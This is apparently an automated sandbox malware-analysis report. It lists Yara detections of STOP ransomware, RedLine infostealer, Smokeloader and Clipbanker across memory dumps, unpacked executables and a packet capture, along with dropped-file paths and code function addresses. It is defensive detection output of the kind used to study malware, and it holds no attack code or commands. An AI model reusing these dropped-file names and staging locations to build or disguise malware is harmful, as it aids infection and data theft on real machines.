Source: Yara match	File source: 00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.693972740.00000000041B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.669374057.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.640576372.00000000040F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.636451401.0000000004140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.666710830.0000000004120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.672588515.0000000004050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.697156815.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: E640.exe PID: 7032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E640.exe PID: 7100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 617B.exe PID: 7136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 617B.exe PID: 3192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5274.exe PID: 6708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5274.exe PID: 6700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: C474.exe PID: 6756, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5274.exe PID: 2148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: C474.exe PID: 476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5274.exe PID: 5080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5274.exe PID: 7048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5274.exe PID: 2788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5274.exe PID: 6836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5274.exe PID: 5428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5274.exe PID: 5780, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 17.2.325D.exe.4320ee8.5.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.3.325D.exe.25d0e28.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.325D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.3.325D.exe.25d0e28.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.C474.exe.41215a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.C474.exe.41215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.325D.exe.4171e76.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 24.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 44.2.5274.exe.41b15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 44.2.5274.exe.41b15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.325D.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.5274.exe.41815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.5274.exe.41815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.325D.exe.4172d5e.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.325D.exe.3e30e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.325D.exe.4320ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 44.2.5274.exe.41b15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 44.2.5274.exe.41b15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.5274.exe.40f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.5274.exe.40f15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.617B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.617B.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.5274.exe.40f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.5274.exe.40f15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.617B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.617B.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 20.2.5274.exe.41a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 20.2.5274.exe.41a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.5274.exe.41815a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.5274.exe.41815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.E640.exe.41015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.E640.exe.41015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.E640.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.E640.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.617B.exe.41415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.617B.exe.41415a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.325D.exe.4172d5e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 20.2.5274.exe.41a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 20.2.5274.exe.41a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.2.C474.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.2.C474.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.325D.exe.4171e76.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 30.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.5274.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 30.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 30.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.3.325D.exe.3eb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.325D.exe.4320000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.2.E640.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.E640.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.E640.exe.41015a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.E640.exe.41015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.325D.exe.4320000.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 23.0.FE5F.exe.980000.0.unpack, type: UNPACKEDPE	Matched rule: Detects downloader / injector Author: ditekSHen
Source: 7.2.617B.exe.41415a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.617B.exe.41415a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.5274.exe.40515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.5274.exe.40515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.C474.exe.41215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.C474.exe.41215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.5274.exe.40515a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.5274.exe.40515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 24.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 24.2.5274.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 18.2.C474.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.2.C474.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.572266464.0000000004071000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000015.00000002.678970915.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000011.00000003.657205781.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.572111296.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000011.00000002.803593297.0000000003E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000011.00000002.802780710.0000000002568000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.572121634.0000000002480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000002C.00000002.693972740.00000000041B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.634264306.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000016.00000002.671418165.0000000003FBC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.640494053.0000000004023000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000D.00000002.664431605.000000000400F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.572170619.00000000024CA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.636285582.0000000002460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.877619417.0000000004320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000014.00000002.669374057.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000004.00000002.636523858.00000000025F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.637979878.0000000003F81000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.636377602.00000000025C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000014.00000002.668986943.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000009.00000002.640576372.00000000040F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000015.00000002.678831039.0000000003E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000015.00000002.678506233.0000000002549000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000A.00000002.663886959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001E.00000002.698879485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.696312299.0000000003FD7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000008.00000002.638195133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.636451401.0000000004140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000015.00000002.679075530.0000000003E81000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000011.00000002.801800101.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000D.00000002.666710830.0000000004120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000012.00000002.668248290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000016.00000002.672588515.0000000004050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000002C.00000002.693772578.0000000004028000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.635919053.0000000003FD8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.633865910.0000000003FE9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000019.00000002.673436142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000E.00000002.697156815.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E640.exe PID: 7032, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: E640.exe PID: 7100, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 617B.exe PID: 7136, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 617B.exe PID: 3192, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 5274.exe PID: 6708, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 5274.exe PID: 6700, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: C474.exe PID: 6756, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 5274.exe PID: 2148, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: C474.exe PID: 476, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 5274.exe PID: 5080, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 5274.exe PID: 7048, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 5274.exe PID: 2788, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 5274.exe PID: 6836, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 5274.exe PID: 5428, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 5274.exe PID: 5780, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe, type: DROPPED	Matched rule: Detects downloader / injector Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00412ECC	0_2_00412ECC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041148F	0_2_0041148F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004128A3	0_2_004128A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00410F3E	0_2_00410F3E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004109ED	0_2_004109ED
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_00412ECC	4_2_00412ECC
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_0041148F	4_2_0041148F
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_004128A3	4_2_004128A3
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_00410F3E	4_2_00410F3E
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_004109ED	4_2_004109ED
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_0410E6E0	5_2_0410E6E0
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_0410C760	5_2_0410C760
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_0410B000	5_2_0410B000
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_0410B0B0	5_2_0410B0B0
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_041100D0	5_2_041100D0
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_041218D0	5_2_041218D0
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_041030EE	5_2_041030EE
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_0411A930	5_2_0411A930
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_0412F9B0	5_2_0412F9B0
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_0412E9A3	5_2_0412E9A3
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_0410CA10	5_2_0410CA10
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_04110B00	5_2_04110B00
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_0410DBE0	5_2_0410DBE0
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00419F90	6_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0040C070	6_2_0040C070
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0042E003	6_2_0042E003
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0042F010	6_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00410160	6_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_004021C0	6_2_004021C0
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0040D240	6_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0044237E	6_2_0044237E
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_004344FF	6_2_004344FF
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00449506	6_2_00449506
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0043E5A3	6_2_0043E5A3
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0044B5B1	6_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0040A660	6_2_0040A660
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0041E690	6_2_0041E690
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00402750	6_2_00402750
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0040A710	6_2_0040A710
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0040F730	6_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0044D7A1	6_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0042C804	6_2_0042C804
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00481920	6_2_00481920
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0044D9DC	6_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00449A71	6_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00443B40	6_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00402B80	6_2_00402B80
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0044ACFF	6_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0040DD40	6_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0040BDC0	6_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0042CE51	6_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00420F30	6_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00449FE3	6_2_00449FE3

Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll			Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll			Jump to behavior

Source: XandETC.exe.23.dr

Static PE information: Number of sections : 11 > 10

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
